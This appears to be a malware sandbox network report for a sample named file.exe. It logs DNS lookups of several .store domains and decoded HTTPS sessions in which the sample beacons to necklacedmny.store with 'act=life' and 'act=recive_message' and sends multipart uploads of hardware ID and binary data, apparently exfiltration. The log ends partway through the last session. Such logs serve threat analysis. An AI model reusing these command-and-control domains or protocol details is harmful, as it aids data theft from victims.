                                                                      Oct 31, 2024 07:14:14.322413921 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.322474003 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.322868109 CET49710443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.322886944 CET44349710188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.349859953 CET49711443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.349885941 CET44349711188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.349963903 CET49711443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.350298882 CET49711443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:14.350310087 CET44349711188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:14.835727930 CET49711443192.168.2.5188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 07:14:02.863132000 CET | 52090 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 07:14:02.872148991 CET | 53 | 52090 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 07:14:02.910871983 CET | 49889 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 07:14:02.923274040 CET | 53 | 49889 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 07:14:02.924571037 CET | 62785 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 07:14:02.937815905 CET | 53 | 62785 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 07:14:02.944497108 CET | 55922 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 07:14:02.953301907 CET | 53 | 55922 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 07:14:03.060815096 CET | 60107 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 07:14:03.077058077 CET | 53 | 60107 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 07:14:02.863132000 CET | 192.168.2.5 | 1.1.1.1 | 0x6cab | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:02.910871983 CET | 192.168.2.5 | 1.1.1.1 | 0x78d4 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:02.924571037 CET | 192.168.2.5 | 1.1.1.1 | 0xda83 | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:02.944497108 CET | 192.168.2.5 | 1.1.1.1 | 0xe05a | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:03.060815096 CET | 192.168.2.5 | 1.1.1.1 | 0xf2 | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 07:14:02.872148991 CET | 1.1.1.1 | 192.168.2.5 | 0x6cab | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:02.923274040 CET | 1.1.1.1 | 192.168.2.5 | 0x78d4 | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:02.937815905 CET | 1.1.1.1 | 192.168.2.5 | 0xda83 | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:02.953301907 CET | 1.1.1.1 | 192.168.2.5 | 0xe05a | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:03.077058077 CET | 1.1.1.1 | 192.168.2.5 | 0xf2 | No error (0) | necklacedmny.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 07:14:03.077058077 CET | 1.1.1.1 | 192.168.2.5 | 0xf2 | No error (0) | necklacedmny.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                      • necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 06:14:03 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: necklacedmny.store
2024-10-31 06:14:03 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
2024-10-31 06:14:04 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=20nnvm2rpkprlel9a1iltmfar9; expires=Mon, 24-Feb-2025 00:00:43 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wmyIeAleooG9AQZGGvrI7S1FerCRihkoNKKnzvD%2FZC6f9TMyvWzFUi4hH7kC75wC5FeWdUX70Rkc4cT8tvA0nFX4tKZkGkinQe1hRDpi2I3P3barzBBy5H7OIx2NgW6S2weDFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180b20c5a45e3-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1057&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=2776605&cwnd=251&unsent_bytes=0&cid=a1ae01cb72933722&ts=520&x=0"
2024-10-31 06:14:04 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
2024-10-31 06:14:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 06:14:04 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 52
                                                                      Host: necklacedmny.store
2024-10-31 06:14:04 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-31 06:14:05 UTC | 1011 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=kttf9p11avdgk54sicg3kf11hf; expires=Mon, 24-Feb-2025 00:00:44 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC70yE8VA0LTefagaj1rLxuIXcrzaEg%2FEIgX7BKDwxp%2Fg0KDX5vthXaRtXEUSfrKXbS0hBxZhSfn4c7MNUruF8O42iCME8fVa0y7cT4EpkD5hMSvU7Lh6A4CGuoMK88rzoKadEw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180b8ed0c46d1-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2401326&cwnd=251&unsent_bytes=0&cid=7d432ed0319a656d&ts=482&x=0"
                                                                      Data Ascii: 6hOTT1Wb4821mBkQf2WHg81uuLpIRCnB0fDx2q4dVeDmDNgcEbjQ953WCFdqLYyInzv9s0pKIsnO/fHXqF0dqOkTlEpfjevBvpgYEXppioDbb7ryDA0r1Zyro/GsRwHizx+YQ0GJ+ICh2A5ZdGHL3J9ntrhLTiXJ0fPq1qZVFqjzFZJWVZriz7SSHxV8YY+W1CPz8kVVbJWc0+jPjE8J4P5agQRWk6OY/p8bGHJnjY/abr23SEogzdzw5d+iVRO
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 45 74 55 6c 2b 6a 47 73 4a 63 52 46 58 34 74 78 63 54 59 65 2f 33 71 41 6d 6f 32 77 4e 72 6b 38 75 79 6f 58 55 72 67 2f 6c 71 42 42 46 61 54 6f 35 6a 2b 6d 78 73 54 66 6d 69 50 6a 4e 68 67 76 4c 35 47 51 43 48 4a 31 66 66 6d 79 37 31 62 46 61 44 75 47 70 64 49 51 35 48 6d 77 4c 4c 57 57 56 6c 30 64 63 76 63 6e 31 4b 71 73 67 4a 53 59 74 53 63 39 4f 2b 5a 39 78 30 55 72 66 4d 59 6c 30 52 51 6e 4f 66 4c 75 5a 41 52 47 48 42 6f 69 49 48 5a 59 72 32 2b 53 45 6f 6b 78 39 4c 2b 35 64 32 70 57 31 76 75 6f 52 4f 41 42 41 6e 66 30 63 32 77 6e 78 51 66 66 6e 75 6a 74 5a 39 38 38 36 73 43 53 69 43 4e 68 4c 50 6e 30 71 64 52 48 71 6a 6b 46 5a 42 4f 57 5a 44 73 30 72 2b 5a 48 68 35 34 59 49 53 4b 32 6d 32 76 74 55 6c 47 4a 4d 54 53 39 61 4f 58 37 31 6f 44 34 4c 6c 55
                                                                      Data Ascii: EtUl+jGsJcRFX4txcTYe/3qAmo2wNrk8uyoXUrg/lqBBFaTo5j+mxsTfmiPjNhgvL5GQCHJ1ffmy71bFaDuGpdIQ5HmwLLWWVl0dcvcn1KqsgJSYtSc9O+Z9x0UrfMYl0RQnOfLuZARGHBoiIHZYr2+SEokx9L+5d2pW1vuoROABAnf0c2wnxQffnujtZ9886sCSiCNhLPn0qdRHqjkFZBOWZDs0r+ZHh54YISK2m2vtUlGJMTS9aOX71oD4LlU
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 66 6b 79 4c 71 59 42 52 68 38 4c 63 58 45 32 48 76 39 36 67 4a 38 4f 73 72 62 2f 4b 48 77 71 45 59 61 71 75 49 66 6c 41 52 4f 30 66 71 41 75 5a 70 58 51 54 4e 67 68 34 6e 62 63 62 47 79 51 6b 51 72 78 38 37 38 37 4e 53 73 58 52 36 79 34 41 61 58 54 31 53 63 35 38 2b 78 6d 68 38 54 4d 79 50 4c 67 38 63 6a 35 66 4a 75 54 6a 33 48 6e 74 54 35 7a 36 68 52 43 71 76 73 47 4e 68 62 48 34 61 6a 78 37 4c 57 54 31 6c 7a 62 49 61 57 32 6d 4b 33 75 45 39 46 49 38 6a 5a 2f 4f 66 64 70 46 4d 4a 72 75 34 55 6e 6b 39 51 6d 75 44 4c 74 4a 67 65 43 7a 4d 6a 79 34 50 48 49 2b 58 79 61 46 59 74 77 4e 43 78 7a 64 4b 35 57 6c 6d 42 37 78 2b 66 53 45 66 66 2f 49 36 6e 31 68 41 56 4d 7a 58 4c 6a 64 46 76 76 72 56 4b 52 53 6e 4e 31 2f 50 73 30 36 46 61 43 61 72 74 48 6f 70 4c 55
                                                                      Data Ascii: fkyLqYBRh8LcXE2Hv96gJ8Osrb/KHwqEYaquIflARO0fqAuZpXQTNgh4nbcbGyQkQrx8787NSsXR6y4AaXT1Sc58+xmh8TMyPLg8cj5fJuTj3HntT5z6hRCqvsGNhbH4ajx7LWT1lzbIaW2mK3uE9FI8jZ/OfdpFMJru4Unk9QmuDLtJgeCzMjy4PHI+XyaFYtwNCxzdK5WlmB7x+fSEff/I6n1hAVMzXLjdFvvrVKRSnN1/Ps06FaCartHopLU
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 68 32 41 35 5a 64 47 48 4c 33 4a 39 6a 75 62 35 42 53 69 4c 43 30 66 7a 6b 30 71 42 58 46 62 4c 75 45 5a 42 49 57 5a 4c 78 79 72 53 45 48 68 42 2b 59 34 4f 57 33 43 50 7a 38 6b 56 56 62 4a 57 63 77 65 6e 61 6f 30 73 57 72 36 45 4c 31 6c 30 52 6d 4f 2b 41 35 74 59 46 43 33 4e 6d 69 34 50 52 63 62 79 36 54 55 63 73 79 39 66 35 34 4e 43 72 55 78 4b 6d 34 42 6d 5a 52 56 47 61 34 38 6d 73 6d 31 64 58 4d 32 71 54 78 49 63 6a 69 72 35 4a 66 43 2f 62 6e 4f 79 74 77 4f 39 61 46 2b 43 35 56 4a 6c 57 58 4a 66 6e 77 4c 4f 51 48 42 68 79 62 6f 75 45 33 47 4f 34 75 55 31 4c 4b 38 44 57 2b 75 72 4c 70 31 6b 4a 6f 4f 30 51 32 41 6f 52 6d 50 75 41 35 74 59 6e 47 6e 68 68 69 34 6e 4b 49 36 4c 38 57 77 30 72 77 5a 79 72 6f 39 47 6b 56 68 32 72 34 68 65 57 54 31 75 51 37 4d
                                                                      Data Ascii: h2A5ZdGHL3J9jub5BSiLC0fzk0qBXFbLuEZBIWZLxyrSEHhB+Y4OW3CPz8kVVbJWcwenao0sWr6EL1l0RmO+A5tYFC3Nmi4PRcby6TUcsy9f54NCrUxKm4BmZRVGa48msm1dXM2qTxIcjir5JfC/bnOytwO9aF+C5VJlWXJfnwLOQHBhybouE3GO4uU1LK8DW+urLp1kJoO0Q2AoRmPuA5tYnGnhhi4nKI6L8Ww0rwZyro9GkVh2r4heWT1uQ7M
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 44 33 4a 67 67 49 69 64 59 72 43 69 52 51 31 69 6a 64 71 7a 75 34 6e 68 48 52 2b 78 6f 55 7a 49 46 67 72 4b 73 4a 66 75 78 41 68 58 61 69 32 64 78 49 63 78 38 2f 4a 51 44 58 53 4e 6d 2f 44 78 79 36 6c 65 44 61 4f 6d 4b 71 5a 6b 57 70 50 67 7a 4c 2b 52 56 31 63 7a 59 73 76 63 35 69 4f 2b 6f 46 41 43 50 64 76 52 34 2b 53 56 70 30 77 57 72 4b 46 61 32 41 68 56 6c 4f 2f 46 75 59 5a 59 43 32 4e 6d 68 35 4b 54 5a 36 2f 79 44 41 30 39 78 74 50 68 37 64 37 67 54 41 32 74 38 52 65 64 51 78 32 58 38 73 32 79 31 6c 6c 5a 5a 6d 61 48 67 74 4a 32 38 71 4e 55 54 6a 72 4b 6b 50 76 79 31 4b 4d 64 4a 4f 36 68 44 4e 67 63 45 61 72 67 7a 72 43 52 41 51 67 2b 54 59 43 49 33 47 2b 38 74 51 49 44 62 4d 75 63 71 37 43 58 37 31 6b 4b 34 4c 6c 45 79 68 38 45 7a 4c 53 51 37 49 6c
                                                                      Data Ascii: D3JggIidYrCiRQ1ijdqzu4nhHR+xoUzIFgrKsJfuxAhXai2dxIcx8/JQDXSNm/Dxy6leDaOmKqZkWpPgzL+RV1czYsvc5iO+oFACPdvR4+SVp0wWrKFa2AhVlO/FuYZYC2Nmh5KTZ6/yDA09xtPh7d7gTA2t8RedQx2X8s2y1llZZmaHgtJ28qNUTjrKkPvy1KMdJO6hDNgcEargzrCRAQg+TYCI3G+8tQIDbMucq7CX71kK4LlEyh8EzLSQ7Il
                                                                      2024-10-31 06:14:05 UTC1369INData Raw: 5a 33 45 68 7a 44 7a 38 6c 41 4e 64 49 32 62 2f 65 37 59 72 46 4d 59 73 76 4d 53 6d 31 4a 53 32 4e 33 2b 6d 35 73 61 48 48 31 71 74 62 72 2b 61 61 32 2f 54 55 6f 53 38 2b 76 69 35 4d 6e 74 65 78 69 32 34 6c 54 57 42 45 6e 66 75 34 43 66 6e 41 63 55 66 47 72 4c 79 70 39 6e 2f 65 6f 43 61 43 48 41 32 66 33 6b 6d 34 35 58 43 36 33 75 45 39 67 4b 45 5a 4f 6a 6d 50 36 58 48 51 6c 2b 59 6f 7a 49 32 48 6d 36 38 67 77 4e 49 6f 32 45 73 2b 4c 54 76 31 41 55 70 36 30 53 6c 6b 6f 52 67 4b 33 5a 2f 6f 42 58 51 53 41 6a 79 35 61 66 4f 2f 33 31 54 45 41 74 7a 74 4c 77 38 63 75 70 58 67 32 6a 70 69 71 6d 59 56 79 53 35 73 36 35 71 43 6b 34 65 58 32 47 69 39 67 68 6e 62 56 55 54 68 4c 7a 36 2b 4c 6b 79 65 31 37 47 4c 62 69 56 4e 59 45 53 64 2b 37 67 4a 2b 63 42 78 52 38
                                                                      Data Ascii: Z3EhzDz8lANdI2b/e7YrFMYsvMSm1JS2N3+m5saHH1qtbr+aa2/TUoS8+vi5Mntexi24lTWBEnfu4CfnAcUfGrLyp9n/eoCaCHA2f3km45XC63uE9gKEZOjmP6XHQl+YozI2Hm68gwNIo2Es+LTv1AUp60SlkoRgK3Z/oBXQSAjy5afO/31TEAtztLw8cupXg2jpiqmYVyS5s65qCk4eX2Gi9ghnbVUThLz6+Lkye17GLbiVNYESd+7gJ+cBxR8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 06:14:06 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12840
                                                                      Host: necklacedmny.store
2024-10-31 06:14:06 UTC | 12840 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

7CB170F54527605EE227D36909F09D60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-31 06:14:06 UTC | 1011 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=7no2564676qurh71pnhefnvjoh; expires=Mon, 24-Feb-2025 00:00:45 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5dm5GyRF3oH9A6YkLEUCL6tcV0XeHyvQNPNPaGAEWByRzPrT0uDW8IliQlfK2RUX6aFObDMaXyOzClJZaYZa5r75PZeiPjMGpkSm4YuohMBMZdCpsX3nr46J7FyucR1qEOmtIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180c158d34638-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1900&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13782&delivery_rate=1636158&cwnd=251&unsent_bytes=0&cid=53b012f9a813ad48&ts=523&x=0"
2024-10-31 06:14:06 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
Data Ascii: 11\r\nok 173.254.250.77\r\n
2024-10-31 06:14:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 06:14:07 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15082
                                                                      Host: necklacedmny.store
2024-10-31 06:14:07 UTC | 15082 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

7CB170F54527605EE227D36909F09D60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-31 06:14:07 UTC | 1026 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=k50k1glbjmt9dc8af80lvn1tlp; expires=Mon, 24-Feb-2025 00:00:46 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJ%2BZYu%2B%2BvVdob4O26rHPBR49uZzTrB2zCEW%2FBbdibs57HkE%2BHUKQIcc9rIH9CyoaaVk2cANq2jvKFiSB1LH2oYk7uHDlRDQ9OhbMb6n%2Bg%2FfGQWZYGzIbJ1vnVUR5TE%2Fi8BqmNWg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180c8eefc6bb3-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2516072&cwnd=251&unsent_bytes=0&cid=1cf656267a79c68d&ts=534&x=0"
2024-10-31 06:14:07 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
Data Ascii: 11\r\nok 173.254.250.77\r\n
2024-10-31 06:14:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 06:14:08 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20572
                                                                      Host: necklacedmny.store
2024-10-31 06:14:08 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

7CB170F54527605EE227D36909F09D60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

3
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-31 06:14:08 UTC | 5241 | OUT | Data Raw: [binary data]
2024-10-31 06:14:09 UTC | 1025 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=jv8ebja1lpmc27srl003avipmt; expires=Mon, 24-Feb-2025 00:00:48 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BQjpgDipHzVQrmfsmGQbY%2BnoSUTk3dqFoRzFqQ3rd%2FGVso0NSwMRlXZ%2BcMduUJzbxACx21ZBoZY21zAJWW0vXBZkbv%2FcuR4E%2F98TTVLLP7bsD8jRx67%2F9WxvoG2d1JqKNDOmOrM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180d17db56b25-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=13&recv=27&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21536&delivery_rate=2273155&cwnd=235&unsent_bytes=0&cid=2260066484edeb22&ts=691&x=0"
2024-10-31 06:14:09 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
Data Ascii: 11\r\nok 173.254.250.77\r\n
2024-10-31 06:14:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-31 06:14:10 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1255
                                                                      Host: necklacedmny.store
2024-10-31 06:14:10 UTC | 1255 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

7CB170F54527605EE227D36909F09D60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-31 06:14:10 UTC | 1012 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=mtem9gehbcjfhcnnvss175cl98; expires=Mon, 24-Feb-2025 00:00:49 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obTOf7MI3Ttk0cmLg%2Fl9yePIn0bmFZMBHXeoIsFleqB7cnzaZ6%2Bvnfkep7Uc2SuRvCqhdMCodhLZ5p6cErgynrBDZZCyWYPz7BCOnInORXlexezVGJczfWUyIW8Ge107dr3nXig%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180db2f8545ea-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2174&delivery_rate=2417362&cwnd=222&unsent_bytes=0&cid=8819bb8b509fcf17&ts=298&x=0"
2024-10-31 06:14:10 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
Data Ascii: 11\r\nok 173.254.250.77\r\n
2024-10-31 06:14:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | 6648 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
